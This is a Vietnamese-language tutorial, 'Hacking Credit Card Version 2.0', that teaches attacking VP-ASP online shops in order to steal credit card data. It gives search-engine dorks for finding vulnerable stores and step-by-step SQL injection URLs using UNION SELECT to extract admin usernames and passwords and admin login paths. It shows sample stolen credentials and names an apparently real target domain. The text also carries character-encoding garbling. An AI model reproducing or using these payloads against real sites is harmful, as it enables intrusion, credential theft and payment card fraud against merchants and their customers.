cat=' Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và có lẽ đây là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sư
Trang 1Hacking Credit Card Version 2.0 - Written by Hieupc
shopdisplayproducts.asp? cat='
Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và có lẽ đây
là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trả lời những câu hỏi thắc mắc của các bạn và hieupc cũng đã làm 1 bản Ebook hacking credit card
Nào giờ chúng ta bắt đầu bắt đầu nhé.
Cách này cũng nhý những cách thông thường là khai thác theo l ỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như: OLE DB, JET Database, ASPẦ
Býớc 1:
Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good
Từ khoá nên dùng:
allinurl:Ợshopdisplayproducts.asp?id=
hoặc allinurl:Ợshopdisplayproducts.asp?cat=1 hoặc allinurl:Ợshopdisplayproducts.asp?cat=2ẦẦ
Search shop theo Domain com, net , bizẦ :
allinurl:Ợ.com/shopdisplayproducts.asp?cat=,allinurl:Ợ.net/shopdisplayproducts.asp?cat=
Ai biết chấm gì nữa thì thay vào :)
Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn
Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt đầu hack
Býớc 2:
Vắ dụ: lấy vắ dụ là 1 site thế có dạng thế này : http://www.victim.com
http://www.victim.com/shopdisplayproducts.asp?id=5
Ta sẽ thêm dấu phẩy ( ` ) vào sau số 5:
http://www.victim.com/shopdisplayproducts.asp?id=5'
Xem nó có bị lỗi không nào, hic nó không bị lỗi, chỉ thấy thế này:
Home Improvement Page 1 of 2
Trang 2Không sao, chúng ta hãy bình tĩnh nhé, thay “ id “ bằng “ cat “ thử xem:
http://www.victim.com/shopdisplayproducts.asp?id=5'
>>> http://www.victim.com/shopdisplayproducts.asp?cat=5'
Uh, nó lỗi ruì kìa:
5' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.
catdescription like '5'%' and hide=0 order by specialoffer desc,cname'.
/shop$db.asp, line 467
Okie, tiếp tục nhé, bạn sẽ thêm ðoạn code sau ðây vào:
'%20union%20%20select%201%20from%20tbluser"having%201=1 sp_password
http://www.victim.com/shopdisplayproducts.asp?id=5'
Khi thêm xong thì sẽ nhý thế này:
http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201%20from%20tbluser"having% 201=1 sp_password
và ðýợc thế? này :
5' union select 1 from tbluser"having 1=1 sp_password Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 467
Chú ý nhé các bạn, cái dấu phẩy ( ` ) rất quan trọng, không có là không được
Và cứ thế ta cứ tiếp tục thêm số nhé:
http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2%20from%20tbluser"having% 201=1 sp_password
Trang 3%201=1 sp_password
http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3,4%20from%
20tbluser"having%201=1 sp_password
Cứ thế mà tiếp tục cho ðến khi bạn thấy 1 cái bảng đẹp đẹp hiện ra với vài con số
Ở ðây là tới số 47 :
http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,
fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having
%201=1 sp_password
3
click to see more 4
22
18
Please review these other products:
Nào giờ chúng ta bắt đầu lấy user and pass:
· fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn
· fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn
Sau khi thêm xong ta sẽ được nhý thế này:
http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,
fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having
%201=1 sp_password
Và có được username và password :
User: stephenrossi
pass: gnilsur
Hoặc bạn có thể gộp chung fldusername và fldpassword vào 1 số cũng được
http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername%2b'/'%
2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1 sp_password
Ta sẽ có user và pass được gộp chung 1 số:
stephenrossi/gnilsur
Trang 4Bước 3:
Tìm link admin, thử đánh cái này vào được không nào: http://www.victim.com/shopadmin.asp hic không được rồi Thử cái này nữa thử xem, may ra nó chạy đến link admin thì sao: http://www.victim.com/shopadmin1.asp , cũng không được
Cái này hieupc đã download cái source của VPASP về xem cấu trúc nó thế nào, và đã tìm ra cậu lệnh thế này, chẳng qua là thay table thôi
Ta biết table configuration là nơi chứa những thông quan trọng của shop như là link admin, afftemplateaffiliate, afftemplateMerchant…
Vậy cậu lệnh sẽ thế này:
'%20union%20%20select%
201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password
Thay vào ta sẽ được:
http://www.valuevision.com.ph/shopdisplayproducts.asp?cat='%20union%20%20select%
201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password
Ta cũng thấy cái bảng:
3
click to see more 4
22
18
Please review these other products:
Lần này thì ta sẽ kiếm link admin, thường thì link admin nằm trong fieldvalue , vì thế ta sẽ đặt fieldvalue vào số 3, hay 4, hay 22 tuỳ các bạn
'%20union%20%20select%201,2,3,
fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password
Sau khi thêm xong ta sẽ được thế này:
http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,
fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password
Trang 5Các bạn sẽ chẳng thấy link admin ở đâu hết toàn là mấy con số, lúc đầu hieupc cũng tưởng là mình làm sai cậu lệnh, nhưng loay hoay 1 đỗi , kéo trang lên, kéo trang xuống, à thì ra có tới 10 trang
Page 1 of 10
Chỉ cần để ý là các bạn thấy thôi, nói thêm là: mỗi một trang như vậy là chứa những thông tin có trong fieldvalue , các bạn cứ cố gắng view từng trang nhé, hieupc view hết 10 trang và thu thập được những link có đuôi là *.asp:
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
Nhất định 1 trong 3 link này là link admin login , hieupc đã thử hết 3 link và cái link đầu tiên là link admin
shopaddmoretocart.asp
http://www.victim.com/shopaddmoretocart.asp
This site is reserved for Shop Administrators only.
Administrator's Login
UserName :
Password :
Bây giờ lấy username và password ở trên để thay vào Việc còn lại chắc các bạn biết
THE END
Image Field